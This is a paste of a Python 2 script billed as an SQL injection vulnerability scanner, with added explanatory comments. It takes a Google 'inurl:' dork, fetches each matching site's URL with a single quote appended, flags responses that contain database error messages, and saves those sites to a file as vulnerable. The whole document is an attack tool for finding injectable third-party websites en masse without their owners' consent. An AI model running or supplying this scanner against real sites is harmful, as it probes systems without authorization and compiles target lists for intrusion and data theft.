Googleinurl

PYTHON SQL Injection vulnerability scanner - Python

Nov 17th, 2013
  1. #PYTHON SQL Injection vulnerability scanner (Powered by Google.)
  2. #Coded by : wh4tsec
  3. #GNU General Public License, version 2 (GPL-2.0)
  4.  
  5.  
  6. #!/usr/bin/python
  7. import urllib2
  8. import sys
  9.  
# Name of the output file, e.g. vul.dat. The path is relative, so the file is
# created in the current working directory; it is opened with mode "w" further
# down, which truncates any previous contents.
filename = "vul.dat"
  12.  
def isvul(url):
    """Fetch *url* and report whether the response body shows a database error.

    Returns 1 if any of the error strings listed below occurs in the body,
    otherwise 0.

    The check is a plain substring match on the returned page. It therefore
    indicates verbose error disclosure rather than a confirmed injection:
    a page that merely quotes one of these strings matches too, and an
    application that returns a generic error page and logs the details
    server-side never matches.

    Exceptions raised by urlopen() or read() are not caught here and
    propagate to the caller; in that case close() is not reached.
    """
    response = urllib2.urlopen(url)
    body = response.read()
    response.close()

    # Error texts leaked by common stacks when a query fails to parse or run.
    error_signatures = (
        # MySQL server / PHP mysql extension
        "You have an error in your SQL",
        "supplied argument is not a valid MySQL result resource in",
        # PHP warning text, not database-specific
        "Division by zero in",
        # Microsoft JET / Access, SQL Server and Oracle via OLE DB / ODBC
        "Microsoft JET Database",
        "Microsoft OLE DB Provider for SQL Server",
        "ODBC Microsoft Access Driver",
        "Unclosed quotation mark",
        "Microsoft OLE DB Provider for Oracle",
        "Incorrect syntax near",
        # Generic application-level message
        "SQL query failed",
    )
    for signature in error_signatures:
        if signature in body:
            return 1
    return 0
# Read the four search parameters interactively (Python 2 raw_input returns
# the typed line as a string, without validation).
#   dork    - text placed after the "inurl:" search operator
#   ttld    - passed to search() as tld
#   lng     - passed to search() as lang
#   results - converted with int() below and passed as stop; a non-numeric
#             value raises ValueError at that point
dork = raw_input("Enter dork: ")
ttld = raw_input("Enter tld: ")
lng = raw_input("Language: ")
results = raw_input("Results: ")

# NOTE: the name `file` shadows the Python 2 builtin of the same name.
# Mode "w" truncates an existing vul.dat.
file = open(filename,"w")
# Trailing comma: Python 2 print statement without a newline.
print 'WORKING',

# Getting matched URLs from Google via the third-party `google` package,
# imported here rather than at the top of the file.
from google import search
for url in search('inurl:' + dork, tld='' + ttld, lang='' + lng, stop=(0 + int(results))):
    # A single quote is appended to the end of the whole URL string, so it lands
    # in whatever comes last (typically the final query-string value).
    # In web server logs this shows up as a request for an indexed URL with a
    # trailing ' and, since no headers are set, urllib2's default User-Agent.
    url = url + "'"
    print '.',
    # isvul() does not catch network or HTTP errors; an exception here ends the
    # loop and the script before file.close() is reached.
    if isvul(url) == 1:
       # One matching URL per line, CRLF-terminated, including the appended quote.
       file.write(url)
       file.write("\r\n")
       print 'BOOM!',

file.close()

# The summary message hard-codes 'vul.dat' instead of using `filename`, so it
# goes stale if the constant above is changed.
print "\r\nDone, urls of vulnurable sites saved in 'vul.dat'"
print "coded by: wh4tsec"
print "------------------------------------------------------"
# BeautifulSoup is not imported in this file; presumably a dependency of the
# `google` search package - confirm.
print "Credits: BeautifulSoup-2.3.0 And Google Search Python"